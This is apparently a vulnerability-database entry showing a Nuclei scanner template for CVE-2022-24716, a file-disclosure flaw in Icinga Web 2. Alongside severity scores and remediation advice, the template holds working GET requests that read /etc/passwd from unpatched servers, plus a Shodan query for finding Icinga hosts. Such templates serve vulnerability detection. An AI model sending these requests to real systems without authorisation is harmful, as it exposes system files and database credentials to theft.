Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-24716
HistoryMay 08, 2023 - 5:24 p.m.

Icinga Web 2 - Arbitrary File Disclosure

2023-05-0817:24:19
ProjectDiscovery
github.com

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.201 Low

EPSS

Percentile

96.3%

Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
id: CVE-2022-24716

info:
  name: Icinga Web 2 - Arbitrary File Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.
  remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
  reference:
    - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
    - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html
    - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d
    - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw
    - https://security.gentoo.org/glsa/202208-05
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24716
    cwe-id: CWE-22
    epss-score: 0.25375
    epss-percentile: 0.96582
    cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: icinga
    product: icinga_web_2
    shodan-query: title:"Icinga"
  tags: cve,cve2022,packetstorm,icinga,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
      - "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
      - "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - text/plain

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.201 Low

EPSS

Percentile

96.3%